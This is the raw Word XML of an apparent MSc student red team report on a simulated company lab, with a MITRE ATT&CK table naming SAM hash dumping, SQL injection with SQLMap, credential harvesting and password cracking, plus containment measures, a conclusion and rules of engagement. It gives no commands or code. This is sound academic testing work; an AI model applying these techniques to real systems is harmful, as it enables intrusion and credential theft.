              <w:t>OS Credential Dumping: SAM</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54B16F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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627CD6F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="07C52479"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099149E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial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BB8D4FA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</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CCF6405" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit Public-Facing App (SQLi)</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3CEE8E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLMap</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B989626" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="23A4C0A9"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114E251" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Collection</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3B0549" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1213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8467C6A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data from Information Repositories</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31FBF82" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLMap</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4029F43" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7A4528F6"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27FCC6B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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BD1E11C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1552.001</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DB5F0E0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credentials in Files</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E69BF8" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLMap dump</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4FA1D5C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="190A72BC"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A415DB4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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8B49171" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1110.002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3C67BA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password Cracking</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26435F1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLMap hash</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76438F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40E04919" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776123C3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A5EE51" w14:textId="120A9D36" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Containment and Safety Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB48AA4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>All VMs configured on VirtualBox Host-Only Adapter — no external internet access possible at any point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537A106" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DHCP disabled; static IPs assigned to prevent scope drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02294F28" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Pre-attack snapshots taken for all target VMs — labelled: Clean State — Before Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE5B32" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>All offensive activity initiated exclusively from Kali Linux (192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D4057" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>No real credentials, personal data, or production infrastructure involved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA3CC3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">All evidence retained in isolated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>PenTest_Evidence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder on host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764EFA0" w14:textId="2B128D7D" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649BE7E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This red team engagement successfully demonstrated three distinct exploit chains against the ABCD Ltd virtualised environment, achieving root access on a Linux server, SYSTEM-level control on Windows Server 2019, and complete database exfiltration via SQL injection. All phases were documented with screenshot evidence and mapped to the MITRE ATT&amp;CK Enterprise Framework [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DBACA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C2460E" w14:textId="3A45C355" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The findings reveal systemic security weakness: unpatched legacy services, absent multi-factor authentication, disabled host-based defences, and unsanitised web application input. A defence-in-depth strategy incorporating regular patching, strong authentication, network segmentation, continuous SIEM monitoring, and secure development practices is essential to withstand modern adversarial techniques [9][10].</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0670F6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A: Rules of Engagement (RoE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E285A18"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8"/>
        <w:gridCol w:w="6218"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="091CD428" w14:textId="77777777">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D15248F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="621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3F28539F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="68F9D164"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203AA65" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Client</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1ACB071" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ABCD Ltd (academic simulation only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="45E66A5C"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E2CA36" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Engagement Type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1744E22" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full Red Team Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="4864C905"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38B1680" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Testing Period</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9EB067C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>April 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="64632B76"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D8095F6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tester</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05F3B5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MSc Cybersecurity Student — UWTSD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="11CBE564"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B873D5C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>In Scope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E49D70E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.103, 192.168.56.104, 192.168.56.105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="381C2B89"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2BF4BC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Out of Scope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F58AE1B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.102 (Kali), host OS, any external IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="1F9E4AB9"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BEE5A3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Permitted</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57C60E6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Port scanning, CVE exploitation, credential attacks, SQL injection, post-exploitation, hash dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
